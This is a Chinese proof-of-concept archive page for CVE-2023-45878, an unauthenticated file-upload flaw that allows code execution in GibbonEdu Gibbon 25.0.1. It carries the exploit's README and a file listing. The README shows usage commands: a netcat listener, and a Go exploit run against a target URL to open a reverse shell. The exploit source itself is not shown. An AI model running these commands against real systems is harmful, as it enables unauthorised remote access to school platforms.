关联漏洞
标题:
Gibbon 安全漏洞
(CVE-2023-45878)
描述:Gibbon是一个解决教育工作者每天遇到的实际问题的学校平台。 GibbonEdu Gibbon 25.0.1版本存在安全漏洞,该漏洞源于允许未经身份验证的攻击者将任意文件上传到应用程序,并在底层系统上执行代码。
描述
CVE-2023-45878 easy exploit | revers sehell
介绍
## CVE-2023-45878 GibbonEdu Gibbon Exploit version 25.0.1
## GibbonEdu Gibbon version 25.0.1 and before
GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write
## Read More
https://nvd.nist.gov/vuln/detail/CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
## Disclaimer
This exploit is provided for educational and research purposes only. Unauthorized use of this code against systems without explicit permission is illegal and may violate cybercrime laws in various jurisdictions. I assume no responsibility for any misuse or damage caused by this exploit.
It is the user’s responsibility to ensure compliance with all applicable laws and ethical guidelines before executing this code. Do not use this exploit for malicious activities.
## Info
This exploit works exclusively on `Windows Server`. If the vulnerable version of Gibbon runs on a `Linux` server, you will need to modify the exploit accordingly.
## Execute
1. Run netcat: `nc -lnvp <PORT>`
2. Execute the exploit: `go run gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>` or `./gibbon-rce-exploit -url http://vulnerable.com -ip <IP> -p <PORT>`
文件快照
[4.0K] /data/pocs/2fda8abd903ac73f9c61d04b35011fd5e7768a6e
├── [8.7M] gibbon-rce-exploit
├── [3.9K] gibbon-rce-exploit.go
├── [ 37] go.mod
└── [1.1K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。